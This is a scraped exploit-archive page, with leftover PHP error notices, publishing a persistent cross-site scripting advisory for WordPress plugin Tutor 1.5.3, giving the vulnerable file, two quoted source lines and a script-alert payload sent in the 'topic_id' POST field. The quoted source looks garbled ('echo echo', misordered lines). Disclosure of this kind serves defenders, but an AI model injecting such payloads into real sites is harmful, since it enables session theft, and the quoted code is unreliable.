Notice: Undefined index: CUID in /Storage/UserLand/npulse/webRoot/npulse.net/www/core/auth.inc.php on line 18

Notice: Undefined index: force_lang in /Storage/UserLand/npulse/webRoot/npulse.net/www/core/lang.inc.php on line 75

Notice: Undefined index: force_lang in /Storage/UserLand/npulse/webRoot/npulse.net/www/core/lang.inc.php on line 117

Notice: Undefined index: exploit_search in /Storage/UserLand/npulse/webRoot/npulse.net/www/pages/exploits/main.php on line 4

Notice: Undefined offset: 3 in /Storage/UserLand/npulse/webRoot/npulse.net/www/pages/exploits/main.php on line 21

Notice: Undefined index: error in /Storage/UserLand/npulse/webRoot/npulse.net/www/pages/exploits/main.php on line 48
nPulse.net Official - Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting

Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting

#  Tile: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
#  Author: mehran feizi
#  Category: webapps
#  Date: 2020-02-12
#  vendor home page: https://wordpress.org/plugins/tutor/

===================================================================
Vulnerable page:
/Quiz.php
===================================================================
Vulnerable Source:
473: echo echo $topic_id; 
447: $topic_id = sanitize_text_field($_POST['topic_id']); 
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/classes/Quiz.php
$_POST('topic_id') = <script>alert('mehran')</script>
=================================================================================

All rights reserved nPulse.net 2009 - 2020
Powered by: MVCP / ASPF / PHP 7.2 / NGINX / FreeBSD